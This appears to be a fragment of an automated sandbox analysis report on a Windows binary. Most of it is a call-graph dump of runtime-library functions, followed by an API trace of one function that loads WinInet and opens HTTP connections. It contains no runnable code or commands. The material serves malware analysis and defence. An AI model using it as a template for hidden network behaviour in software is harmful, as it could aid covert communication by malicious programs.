110101f6 30587->30601 30613 1100f5c0 30587->30613 30588 11161559 std::locale::_Init LeaveCriticalSection 30590 11010266 30588->30590 30590->30567 30603 11161531 30590->30603 30592 11010227 30594 11161531 std::_Lockit::_Lockit EnterCriticalSection 30592->30594 30597 1101023a 30594->30597 30595 11010219 30624 111634b1 RaiseException 30595->30624 30598 11161559 std::locale::_Init LeaveCriticalSection 30597->30598 30599 1101024e 30598->30599 30625 11161585 262 API calls std::locale::_Init 30599->30625 30601->30588 30602->30553 30604 11010b99 30603->30604 30605 11161543 30603->30605 30607 11161559 30604->30607 30831 111626fa EnterCriticalSection 30605->30831 30608 11161560 30607->30608 30609 1116156e 30607->30609 30832 1116270a LeaveCriticalSection 30608->30832 30609->30567 30611->30562 30612->30561 30614 1100f663 30613->30614 30615 1100f5f3 30613->30615 30614->30592 30623 111630c1 66 API calls std::exception::exception 30614->30623 30615->30614 30616 111101b0 std::locale::_Init 262 API calls 30615->30616 30618 1100f5fe 30616->30618 30617 1100f640 30617->30614 30626 1100ee20 30617->30626 30618->30617 30639 1100ed70 103 API calls 4 library calls 30618->30639 30621 1100f629 30640 111614c1 74 API calls 2 library calls 30621->30640 30623->30595 30624->30592 30625->30601 30641 111616da 30626->30641 30629 1100ee69 30631 1100ee7c 30629->30631 30632 11163aa5 _free 66 API calls 30629->30632 30630 11163aa5 _free 66 API calls 30630->30629 30633 1100ee8f 30631->30633 30634 11163aa5 _free 66 API calls 30631->30634 30632->30631 30635 1100eea2 30633->30635 30637 11163aa5 _free 66 API calls 30633->30637 30634->30633 30636 11161559 std::locale::_Init LeaveCriticalSection 30635->30636 30638 1100eeb6 30636->30638 30637->30635 30638->30614 30639->30621 30640->30617 30642 1100ee57 30641->30642 30643 111616e9 30641->30643 30642->30629 30642->30630 30645 111663a3 30643->30645 30646 111663af _fseek 30645->30646 30647 111663d0 30646->30647 30648 111663b9 30646->30648 30649 1116c675 __getptd 66 API calls 30647->30649 30706 1116a1af 66 API calls __getptd_noexit 30648->30706 30652 111663d5 30649->30652 30651 111663be 30707 1116edc4 11 API calls _fseek 30651->30707 30654 11171306 _LocaleUpdate::_LocaleUpdate 74 API calls 30652->30654 30655 111663df 30654->30655 30656 1116ac7e __calloc_crt 66 API calls 30655->30656 30657 111663f5 30656->30657 30658 111663c9 _fseek _setlocale 30657->30658 30659 1117459f __lock 66 API calls 30657->30659 30658->30642 30660 1116640b 30659->30660 30681 11165814 30660->30681 30667 111664ec 30712 111710d5 8 API calls 30667->30712 30668 1116643b __expandlocale 30671 1117459f __lock 66 API calls 30668->30671 30670 111664f2 30713 1117116e 66 API calls 4 library calls 30670->30713 30673 11166461 30671->30673 30708 111712b9 74 API calls 3 library calls 30673->30708 30675 11166473 30709 111710d5 8 API calls 30675->30709 30677 11166479 30680 11166497 30677->30680 30710 111712b9 74 API calls 3 library calls 30677->30710 30711 111664e1 LeaveCriticalSection _doexit 30680->30711 30682 11165836 30681->30682 30683 1116581d 30681->30683 30685 111664d5 30682->30685 30683->30682 30714 11171046 8 API calls 30683->30714 30715 111744c6 LeaveCriticalSection 30685->30715 30687 11166422 30688 11166187 30687->30688 30689 111661b0 30688->30689 30693 111661cb 30688->30693 30692 11165e4d __setlocale_set_cat 101 API calls 30689->30692 30697 111661ba 30689->30697 30690 1116631c 30716 11165c2c 30690->30716 30692->30697 30693->30690 30701 111662f5 30693->30701 30702 11166200 _strpbrk _strncmp _strcspn _strlen 30693->30702 30695 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30696 111663a1 30695->30696 30696->30667 30696->30668 30697->30695 30699 11166331 __expandlocale 30699->30697 30699->30701 30730 11165e4d 30699->30730 30701->30697 30773 11165ac7 70 API calls 6 library calls 30701->30773 30702->30697 30702->30701 30703 1116630e 30702->30703 30705 11165e4d __setlocale_set_cat 101 API calls 30702->30705 30772 111699f9 66 API calls _fseek 30702->30772 30704 1116ed72 __invoke_watson 10 API calls 30703->30704 30704->30697 30705->30702 30706->30651 30707->30658 30708->30675 30709->30677 30710->30680 30711->30658 30712->30670 30713->30658 30714->30682 30715->30687 30717 1116c675 __getptd 66 API calls 30716->30717 30718 11165c67 30717->30718 30719 11165cd4 30718->30719 30728 11165ccd __expandlocale _memmove _strlen 30718->30728 30817 1116cd5f 30718->30817 30720 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30719->30720 30721 11165e4b 30720->30721 30721->30699 30724 1116ed72 __invoke_watson 10 API calls 30724->30728 30726 1116cd5f _strcpy_s 66 API calls 30726->30728 30728->30719 30728->30724 30728->30726 30774 1116593d 30728->30774 30781 11174bcc 30728->30781 30826 11165a5c 66 API calls 3 library calls 30728->30826 30827 111699f9 66 API calls _fseek 30728->30827 30731 1116c675 __getptd 66 API calls 30730->30731 30732 11165e7a 30731->30732 30733 11165c2c __expandlocale 96 API calls 30732->30733 30737 11165ea2 __expandlocale _strlen 30733->30737 30734 11165ea9 30735 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30734->30735 30736 11165eb7 30735->30736 30736->30699 30737->30734 30738 1116ac39 __malloc_crt 66 API calls 30737->30738 30739 11165ef3 _memmove 30738->30739 30739->30734 30740 1116cd5f _strcpy_s 66 API calls 30739->30740 30746 11165f66 _memmove 30740->30746 30741 11166155 30742 1116ed72 __invoke_watson 10 API calls 30741->30742 30743 11166186 30742->30743 30744 111661b0 30743->30744 30751 111661cb 30743->30751 30747 111661ba 30744->30747 30750 11165e4d __setlocale_set_cat 100 API calls 30744->30750 30745 111662f5 30745->30747 30830 11165ac7 70 API calls 6 library calls 30745->30830 30746->30741 30763 1116606a _memcmp 30746->30763 30828 11174ea4 79 API calls 2 library calls 30746->30828 30753 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30747->30753 30748 1116631c 30752 11165c2c __expandlocale 96 API calls 30748->30752 30750->30747 30751->30745 30751->30748 30768 11166200 _strpbrk _strncmp _strcspn _strlen 30751->30768 30765 11166331 __expandlocale 30752->30765 30757 111663a1 30753->30757 30754 111660f0 30759 11163aa5 _free 66 API calls 30754->30759 30755 11166121 30755->30741 30756 1116612d InterlockedDecrement 30755->30756 30756->30741 30760 11166145 30756->30760 30757->30699 30759->30734 30761 11163aa5 _free 66 API calls 30760->30761 30762 1116614d 30761->30762 30764 11163aa5 _free 66 API calls 30762->30764 30763->30754 30763->30755 30764->30741 30765->30745 30765->30747 30766 11165e4d __setlocale_set_cat 100 API calls 30765->30766 30766->30765 30768->30745 30768->30747 30769 1116630e 30768->30769 30771 11165e4d __setlocale_set_cat 100 API calls 30768->30771 30829 111699f9 66 API calls _fseek 30768->30829 30770 1116ed72 __invoke_watson 10 API calls 30769->30770 30770->30747 30771->30768 30772->30702 30773->30697 30776 11165956 _memset 30774->30776 30775 11165962 30775->30728 30776->30775 30777 111699f9 ___lc_strtolc 66 API calls 30776->30777 30780 11165985 _strcspn 30776->30780 30777->30780 30778 1116ed72 __invoke_watson 10 API calls 30778->30780 30779 111699f9 ___lc_strtolc 66 API calls 30779->30780 30780->30775 30780->30778 30780->30779 30782 1116c675 __getptd 66 API calls 30781->30782 30785 11174bd9 30782->30785 30783 11174be6 GetUserDefaultLCID 30799 11174c6d 30783->30799 30785->30783 30787 1117463f _TranslateName 85 API calls 30785->30787 30790 11174c10 30785->30790 30786 11174c78 30786->30783 30788 11174c83 _strlen 30786->30788 30787->30790 30797 11174c89 EnumSystemLocalesA 30788->30797 30789 111746a1 ___get_qualified_locale 82 API calls 30795 11174cde 30789->30795 30790->30786 30792 11174c22 30790->30792 30791 11174c36 30794 11174b90 _GetLcidFromLanguage EnumSystemLocalesA 30791->30794 30792->30791 30793 11174c2d 30792->30793 30796 11174b29 _GetLcidFromLangCountry EnumSystemLocalesA 30793->30796 30798 11174c34 30794->30798 30801 11174d03 IsValidCodePage 30795->30801 30805 11174dae 30795->30805 30796->30798 30797->30799 30798->30799 30800 1117463f _TranslateName 85 API calls 30798->30800 30799->30789 30799->30805 30803 11174c54 30800->30803 30802 11174d15 IsValidLocale 30801->30802 30801->30805 30802->30805 30809 11174d28 30802->30809 30803->30799 30804 11174c6f 30803->30804 30806 11174c66 30803->30806 30807 11174b90 _GetLcidFromLanguage EnumSystemLocalesA 30804->30807 30805->30728 30810 11174b29 _GetLcidFromLangCountry EnumSystemLocalesA 30806->30810 30807->30799 30808 11174d79 GetLocaleInfoA 30808->30805 30812 11174d8a GetLocaleInfoA 30808->30812 30809->30805 30809->30808 30811 1116cd5f _strcpy_s 66 API calls 30809->30811 30810->30799 30813 11174d66 30811->30813 30812->30805 30814 11174d9e 30812->30814 30813->30812 30816 1116ed72 __invoke_watson 10 API calls 30813->30816 30815 1116c308 __itow_s 66 API calls 30814->30815 30815->30805 30816->30808 30818 1116cd6d 30817->30818 30821 1116cd74 30817->30821 30818->30821 30824 1116cd92 30818->30824 30819 1116a1af _fseek 66 API calls 30820 1116cd79 30819->30820 30822 1116edc4 _fseek 11 API calls 30820->30822 30821->30819 30823 1116cd83 30822->30823 30823->30728 30824->30823 30825 1116a1af _fseek 66 API calls 30824->30825 30825->30820 30826->30728 30827->30728 30828->30763 30829->30768 30830->30747 30831->30604 30832->30609 30834 11019965 30833->30834 30836 11019989 30834->30836 30842 1100f8a0 67 API calls 30834->30842 30838 11019a48 30836->30838 30843 1100dec0 67 API calls 2 library calls 30836->30843 30839 11019a5f 30838->30839 30844 1100fb80 67 API calls 30838->30844 30839->30570 30841 1100dec0 67 API calls 2 library calls 30839->30841 30841->30570 30842->30836 30843->30838 30844->30839 30845 111457a0 30846 111457c2 30845->30846 30850 111457d9 std::locale::_Init 30845->30850 30887 11029a70 262 API calls 2 library calls 30846->30887 30848 11145967 30851 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30848->30851 30850->30848 30852 1114580c GetModuleFileNameA 30850->30852 30853 11145983 30851->30853 30854 11081e00 std::locale::_Init IsDBCSLeadByte 30852->30854 30855 11145821 30854->30855 30856 11145831 SHGetFolderPathA 30855->30856 30868 11145918 30855->30868 30858 1114585e 30856->30858 30859 1114587d SHGetFolderPathA 30856->30859 30857 11142e60 std::locale::_Init 259 API calls 30857->30848 30858->30859 30862 11145864 30858->30862 30861 111458b2 std::locale::_Init 30859->30861 30864 1102ad70 std::locale::_Init 142 API calls 30861->30864 30888 11029a70 262 API calls 2 library calls 30862->30888 30866 111458c3 30864->30866 30869 11145240 30866->30869 30868->30857 30868->30868 30870 111452ca 30869->30870 30871 1114524b 30869->30871 30870->30868 30871->30870 30872 1114525b GetFileAttributesA 30871->30872 30873 11145275 30872->30873 30874 11145267 30872->30874 30889 11164bb8 30873->30889 30874->30868 30877 11081e00 std::locale::_Init IsDBCSLeadByte 30878 11145286 30877->30878 30879 11145240 std::locale::_Init 67 API calls 30878->30879 30886 111452a3 30878->30886 30880 11145296 30879->30880 30881 111452ac 30880->30881 30882 1114529e 30880->30882 30883 11163aa5 _free 66 API calls 30881->30883 30884 11163aa5 _free 66 API calls 30882->30884 30885 111452b1 CreateDirectoryA 30883->30885 30884->30886 30885->30886 30886->30868 30890 11164bc9 _strlen 30889->30890 30894 1114527c 30889->30894 30891 11163a11 _malloc 66 API calls 30890->30891 30892 11164bdc 30891->30892 30893 1116cd5f _strcpy_s 66 API calls 30892->30893 30892->30894 30895 11164bee 30893->30895 30894->30877 30895->30894 30896 1116ed72 __invoke_watson 10 API calls 30895->30896 30896->30894 30897 1115cca0 30898 1115ccb4 30897->30898 30899 1115ccac 30897->30899 30909 1116406b 30898->30909 30902 1115ccd4 30903 1115ce00 30905 11163aa5 _free 66 API calls 30903->30905 30906 1115ce28 30905->30906 30907 1115ccf1 30907->30903 30908 1115cde4 SetLastError 30907->30908 30908->30907 30910 11170fc4 _calloc 66 API calls 30909->30910 30911 11164085 30910->30911 30912 1115ccc8 30911->30912 30933 1116a1af 66 API calls __getptd_noexit 30911->30933 30912->30902 30912->30903 30916 1115c8e0 CoInitializeSecurity CoCreateInstance 30912->30916 30914 11164098 30914->30912 30934 1116a1af 66 API calls __getptd_noexit 30914->30934 30917 1115c955 wsprintfW SysAllocString 30916->30917 30918 1115cad4 30916->30918 30923 1115c99b 30917->30923 30919 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30918->30919 30921 1115cb00 30919->30921 30920 1115cac1 SysFreeString 30920->30918 30921->30907 30922 1115caa9 30922->30920 30923->30920 30923->30922 30923->30923 30924 1115ca2c 30923->30924 30925 1115ca1a wsprintfW 30923->30925 30935 110978f0 30924->30935 30925->30924 30927 1115ca3e 30928 110978f0 263 API calls 30927->30928 30929 1115ca53 30928->30929 30940 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Tidy 30929->30940 30931 1115ca97 30941 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Tidy 30931->30941 30933->30914 30934->30912 30936 111101b0 std::locale::_Init 262 API calls 30935->30936 30937 11097923 30936->30937 30938 11097936 SysAllocString 30937->30938 30939 11097954 30937->30939 30938->30939 30939->30927 30940->30931 30941->30922 30942 11070f90 30948 11070fc0 std::ios_base::_Tidy 30942->30948 30943 11071123 30944 11070fe2 Sleep EnterCriticalSection 30944->30948 30945 1107109e LeaveCriticalSection 30945->30948 30948->30943 30948->30944 30948->30945 30950 110710fd 30948->30950 30952 1106c340 292 API calls 30948->30952 30953 11110920 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 30948->30953 30950->30948 30954 1106fa30 329 API calls 3 library calls 30950->30954 30955 11110920 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 30950->30955 30952->30948 30953->30948 30954->30950 30955->30950 30956 1116a5cd 30957 1116a5dd 30956->30957 30958 1116a5d8 30956->30958 30962 1116a4d7 30957->30962 30974 11177f37 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 30958->30974 30961 1116a5eb 30963 1116a4e3 _fseek 30962->30963 30964 1116a580 _fseek 30963->30964 30968 1116a530 30963->30968 30975 1116a373 30963->30975 30964->30961 30967 1116a543 30969 1116a560 30967->30969 30970 11026410 ___DllMainCRTStartup 7 API calls 30967->30970 30968->30964 31025 11026410 30968->31025 30969->30964 30971 1116a373 __CRT_INIT@12 148 API calls 30969->30971 30972 1116a557 30970->30972 30971->30964 30973 1116a373 __CRT_INIT@12 148 API calls 30972->30973 30973->30969 30974->30957 30976 1116a37f _fseek 30975->30976 30977 1116a387 30976->30977 30978 1116a401 30976->30978 31034 1116e390 HeapCreate 30977->31034 30980 1116a407 30978->30980 30981 1116a462 30978->30981 30985 1116a425 30980->30985 30994 1116a390 _fseek 30980->30994 31122 1116e65b 66 API calls _doexit 30980->31122 30982 1116a467 30981->30982 30983 1116a4c0 30981->30983 30986 1116c4ba ___set_flsgetvalue 3 API calls 30982->30986 30983->30994 31128 1116c7be 79 API calls __freefls@4 30983->31128 30984 1116a38c 30984->30994 31035 1116c82c GetModuleHandleW 30984->31035 30990 1116a439 30985->30990 31123 1117226e 67 API calls _free 30985->31123 30987 1116a46c 30986->30987 30992 1116ac7e __calloc_crt 66 API calls 30987->30992 31126 1116a44c 69 API calls __mtterm 30990->31126 30997 1116a478 30992->30997 30993 1116a39c __RTC_Initialize 30998 1116a3a0 30993->30998 31004 1116a3ac GetCommandLineA 30993->31004 30994->30968 30997->30994 31000 1116a484 RtlDecodePointer 30997->31000 31119 1116e3ae HeapDestroy 30998->31119 30999 1116a42f 31124 1116c50b 69 API calls _free 30999->31124 31005 1116a499 31000->31005 31003 1116a434 31125 1116e3ae HeapDestroy 31003->31125 31060 11177e54 GetEnvironmentStringsW 31004->31060 31008 1116a4b4 31005->31008 31009 1116a49d 31005->31009 31012 11163aa5 _free 66 API calls 31008->31012 31127 1116c548 66 API calls 4 library calls 31009->31127 31012->30994 31014 1116a4a4 GetCurrentThreadId 31014->30994 31016 1116a3ca 31120 1116c50b 69 API calls _free 31016->31120 31020 1116a3ea 31020->30994 31121 1117226e 67 API calls _free 31020->31121 31026 111104e0 31025->31026 31027 11110501 31026->31027 31028 111104ec 31026->31028 31030 11110514 ___DllMainCRTStartup 31026->31030 31175 11110430 31027->31175 31028->31030 31032 11110430 ___DllMainCRTStartup 7 API calls 31028->31032 31030->30967 31031 11110508 31031->30967 31033 111104f5 31032->31033 31033->30967 31034->30984 31036 1116c840 31035->31036 31037 1116c849 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 31035->31037 31129 1116c50b 69 API calls _free 31036->31129 31039 1116c893 TlsAlloc 31037->31039 31042 1116c9a2 31039->31042 31043 1116c8e1 TlsSetValue 31039->31043 31040 1116c845 31040->30993 31042->30993 31043->31042 31044 1116c8f2 31043->31044 31130 1116e417 RtlEncodePointer EncodePointer __init_pointers __initp_misc_winsig 31044->31130 31046 1116c8f7 EncodePointer EncodePointer EncodePointer EncodePointer 31131 11174425 InitializeCriticalSectionAndSpinCount 31046->31131 31048 1116c936 31049 1116c99d 31048->31049 31050 1116c93a DecodePointer 31048->31050 31133 1116c50b 69 API calls _free 31049->31133 31052 1116c94f 31050->31052 31052->31049 31053 1116ac7e __calloc_crt 66 API calls 31052->31053 31054 1116c965 31053->31054 31054->31049 31055 1116c96d DecodePointer 31054->31055 31056 1116c97e 31055->31056 31056->31049 31057 1116c982 31056->31057 31132 1116c548 66 API calls 4 library calls 31057->31132 31059 1116c98a GetCurrentThreadId 31059->31042 31061 11177e70 WideCharToMultiByte 31060->31061 31062 1116a3bc 31060->31062 31064 11177ea5 31061->31064 31065 11177edd FreeEnvironmentStringsW 31061->31065 31073 11172029 GetStartupInfoW 31062->31073 31066 1116ac39 __malloc_crt 66 API calls 31064->31066 31065->31062 31067 11177eab 31066->31067 31067->31065 31068 11177eb3 WideCharToMultiByte 31067->31068 31069 11177ec5 31068->31069 31070 11177ed1 FreeEnvironmentStringsW 31068->31070 31071 11163aa5 _free 66 API calls 31069->31071 31070->31062 31072 11177ecd 31071->31072 31072->31070 31074 1116ac7e __calloc_crt 66 API calls 31073->31074 31075 11172047 31074->31075 31075->31075 31077 1116ac7e __calloc_crt 66 API calls 31075->31077 31079 1116a3c6 31075->31079 31081 1117213c 31075->31081 31082 111721bc 31075->31082 31076 111721f2 GetStdHandle 31076->31082 31077->31075 31078 11172256 SetHandleCount 31078->31079 31079->31016 31086 11177d99 31079->31086 31080 11172204 GetFileType 31080->31082 31081->31082 31083 11172173 InitializeCriticalSectionAndSpinCount 31081->31083 31084 11172168 GetFileType 31081->31084 31082->31076 31082->31078 31082->31080 31085 1117222a InitializeCriticalSectionAndSpinCount 31082->31085 31083->31079 31083->31081 31084->31081 31084->31083 31085->31079 31085->31082 31087 11177db3 GetModuleFileNameA 31086->31087 31088 11177dae 31086->31088 31090 11177dda 31087->31090 31140 11171a45 94 API calls __setmbcp 31088->31140 31134 11177bff 31090->31134 31092 1116a3d6 31092->31020 31097 11177b23 31092->31097 31094 1116ac39 __malloc_crt 66 API calls 31095 11177e1c 31094->31095 31095->31092 31096 11177bff _parse_cmdline 76 API calls 31095->31096 31096->31092 31098 11177b2c 31097->31098 31101 11177b31 _strlen 31097->31101 31142 11171a45 94 API calls __setmbcp 31098->31142 31100 1116a3df 31100->31020 31113 1116e46e 31100->31113 31101->31100 31102 1116ac7e __calloc_crt 66 API calls 31101->31102 31106 11177b66 _strlen 31102->31106 31103 11177bb5 31104 11163aa5 _free 66 API calls 31103->31104 31104->31100 31105 1116ac7e __calloc_crt 66 API calls 31105->31106 31106->31100 31106->31103 31106->31105 31107 11177bdb 31106->31107 31109 1116cd5f _strcpy_s 66 API calls 31106->31109 31110 11177bf2 31106->31110 31108 11163aa5 _free 66 API calls 31107->31108 31108->31100 31109->31106 31111 1116ed72 __invoke_watson 10 API calls 31110->31111 31112 11177bfe 31111->31112 31114 1116e47c __IsNonwritableInCurrentImage 31113->31114 31143 1116d88b EncodePointer 31114->31143 31116 1116e49a __initterm_e 31118 1116e4bb __IsNonwritableInCurrentImage 31116->31118 31144 11163dd5 31116->31144 31118->31020 31119->30994 31120->30998 31121->31016 31122->30985 31123->30999 31124->31003 31125->30990 31126->30994 31127->31014 31128->30994 31129->31040 31130->31046 31131->31048 31132->31059 31133->31042 31136 11177c1e 31134->31136 31138 11177c8b 31136->31138 31141 11177590 76 API calls x_ismbbtype_l 31136->31141 31137 11177d89 31137->31092 31137->31094 31138->31137 31139 11177590 76 API calls _parse_cmdline 31138->31139 31139->31138 31140->31087 31141->31136 31142->31101 31143->31116 31147 11163d99 31144->31147 31146 11163de2 31146->31118 31148 11163da5 _fseek 31147->31148 31155 1116e405 31148->31155 31154 11163dc6 _fseek 31154->31146 31156 1117459f __lock 66 API calls 31155->31156 31157 11163daa 31156->31157 31158 11163cb2 RtlDecodePointer DecodePointer 31157->31158 31159 11163ce0 31158->31159 31160 11163d61 31158->31160 31159->31160 31172 1116fe8f 67 API calls _fseek 31159->31172 31171 11163dcf LeaveCriticalSection __cinit 31160->31171 31162 11163cf2 31163 11163d44 EncodePointer EncodePointer 31162->31163 31164 11163d1c 31162->31164 31165 11163d0d 31162->31165 31163->31160 31164->31160 31167 11163d16 31164->31167 31173 1116acca 70 API calls __recalloc 31165->31173 31167->31164 31169 11163d32 EncodePointer 31167->31169 31174 1116acca 70 API calls __recalloc 31167->31174 31169->31163 31170 11163d2c 31170->31160 31170->31169 31171->31154 31172->31162 31173->31167 31174->31170 31176 11110474 EnterCriticalSection 31175->31176 31177 1111045f InitializeCriticalSection 31175->31177 31178 11110495 31176->31178 31177->31176 31179 111104c3 LeaveCriticalSection 31178->31179 31180 111103d0 ___DllMainCRTStartup 4 API calls 31178->31180 31179->31031 31180->31178 31181 1116c488 RtlEncodePointer

                                                                                                                              Executed Functions

                                                                                                                              Function 11029BB0 Relevance: 89.8, APIs: 39, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 11029bb0-11029c3e LoadLibraryA 1 11029c41-11029c46 0->1 2 11029c48-11029c4b 1->2 3 11029c4d-11029c50 1->3 6 11029c65-11029c6a 2->6 4 11029c52-11029c55 3->4 5 11029c57-11029c62 3->5 4->6 5->6 7 11029c99-11029ca5 6->7 8 11029c6c-11029c71 6->8 11 11029d4a-11029d4d 7->11 12 11029cab-11029cc3 call 11163a11 7->12 9 11029c73-11029c8a GetProcAddress 8->9 10 11029c8c-11029c8f 8->10 9->10 13 11029c91-11029c93 SetLastError 9->13 10->7 15 11029d68-11029d80 InternetOpenA 11->15 16 11029d4f-11029d66 GetProcAddress 11->16 22 11029ce4-11029cf0 12->22 23 11029cc5-11029cde GetProcAddress 12->23 13->7 17 11029da4-11029db0 call 11163aa5 15->17 16->15 20 11029d99-11029da1 SetLastError 16->20 28 11029db6-11029de7 call 11142e60 call 11165250 17->28 29 1102a02a-1102a034 17->29 20->17 27 11029cf2-11029cfb GetLastError 22->27 30 11029d11-11029d13 22->30 23->22 25 11029d82-11029d8a SetLastError 23->25 25->27 27->30 31 11029cfd-11029d0f call 11163aa5 call 11163a11 27->31 54 11029de9-11029dec 28->54 55 11029def-11029e04 call 11081d30 * 2 28->55 29->1 33 1102a03a 29->33 35 11029d30-11029d3c 30->35 36 11029d15-11029d2e GetProcAddress 30->36 31->30 38 1102a04c-1102a04f 33->38 35->11 56 11029d3e-11029d47 35->56 36->35 40 11029d8f-11029d97 SetLastError 36->40 42 1102a051-1102a056 38->42 43 1102a05b-1102a05e 38->43 40->11 47 1102a1bf-1102a1c7 42->47 48 1102a060-1102a065 43->48 49 1102a06a 43->49 52 1102a1d0-1102a1e3 47->52 53 1102a1c9-1102a1ca FreeLibrary 47->53 57 1102a18f-1102a194 48->57 50 1102a06d-1102a075 49->50 58 1102a077-1102a08e GetProcAddress 50->58 59 1102a094-1102a0a2 InternetQueryDataAvailable 50->59 53->52 54->55 75 11029e06-11029e0a 55->75 76 11029e0d-11029e19 55->76 56->11 60 1102a196-1102a1ad GetProcAddress 57->60 61 1102a1af-1102a1b5 57->61 58->59 63 1102a14e-1102a150 SetLastError 58->63 64 1102a156-1102a15d 59->64 65 1102a0a8-1102a0ad 59->65 60->61 66 1102a1b7-1102a1b9 SetLastError 60->66 61->47 63->64 69 1102a16c-1102a18d call 11027f00 * 2 64->69 68 1102a0b3-1102a0ef call 11110230 call 11027eb0 65->68 65->69 66->47 90 1102a101-1102a103 68->90 91 1102a0f1-1102a0f4 68->91 69->57 75->76 80 11029e44-11029e49 76->80 81 11029e1b-11029e1d 76->81 87 11029e4b-11029e5c GetProcAddress 80->87 88 11029e5e-11029e75 InternetConnectA 80->88 84 11029e34-11029e3a 81->84 85 11029e1f-11029e32 GetProcAddress 81->85 84->80 85->84 89 11029e3c-11029e3e SetLastError 85->89 87->88 92 11029ea1-11029eac SetLastError 87->92 93 1102a017-1102a027 call 11162777 88->93 94 11029e7b-11029e7e 88->94 89->80 98 1102a105 90->98 99 1102a10c-1102a111 90->99 91->90 97 1102a0f6-1102a0fa 91->97 92->93 93->29 100 11029e80-11029e82 94->100 101 11029eb9-11029ec1 94->101 97->90 105 1102a0fc 97->105 98->99 108 1102a113-1102a129 call 110d12e0 99->108 109 1102a12c-1102a12e 99->109 106 11029e84-11029e97 GetProcAddress 100->106 107 11029e99-11029e9f 100->107 103 11029ec3-11029ed7 GetProcAddress 101->103 104 11029ed9-11029ef4 101->104 103->104 113 11029ef6-11029efe SetLastError 103->113 120 11029f01-11029f04 104->120 105->90 106->107 114 11029eb1-11029eb3 SetLastError 106->114 107->101 108->109 111 1102a130-1102a132 109->111 112 1102a134-1102a145 call 11162777 109->112 111->112 117 1102a15f-1102a169 call 11162777 111->117 112->69 126 1102a147-1102a149 112->126 113->120 114->101 117->69 123 1102a012-1102a015 120->123 124 11029f0a-11029f0f 120->124 123->93 125 1102a03c-1102a049 call 11162777 123->125 128 11029f11-11029f28 GetProcAddress 124->128 129 11029f2a-11029f36 124->129 125->38 126->50 128->129 131 11029f38-11029f40 SetLastError 128->131 132 11029f42-11029f5b GetLastError 129->132 131->132 135 11029f76-11029f8b 132->135 136 11029f5d-11029f74 GetProcAddress 132->136 139 11029f95-11029fa3 GetLastError 135->139 136->135 137 11029f8d-11029f8f SetLastError 136->137 137->139 140 11029fa5-11029faa 139->140 141 11029fac-11029fb8 GetDesktopWindow 139->141 140->141 142 1102a002-1102a007 140->142 143 11029fd3-11029fef 141->143 144 11029fba-11029fd1 GetProcAddress 141->144 142->123 145 1102a009-1102a00f 142->145 143->123 148 11029ff1 143->148 144->143 146 11029ff6-1102a000 SetLastError 144->146 145->123 146->123 148->120
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(WinInet.dll,30AC22AD,7476EA30,?,00000000), ref: 11029BE5
                                                                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                                                                              • _malloc.LIBCMT ref: 11029CB7
                                                                                                                              • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                                                                              • GetLastError.KERNEL32 ref: 11029CF2
                                                                                                                              • _free.LIBCMT ref: 11029CFE
                                                                                                                              • _malloc.LIBCMT ref: 11029D07
                                                                                                                              • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                                                                              • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                                                                              • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                                                                              • _free.LIBCMT ref: 11029DA5
                                                                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                                                                              • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                                                                              • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                                                                              • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                                                                              • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                                                                              • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
                                                                                                                              • InternetQueryDataAvailable.WININET(1117FC4B,1102CCC1,00000000,00000000), ref: 1102A09E
                                                                                                                              • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
                                                                                                                              • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
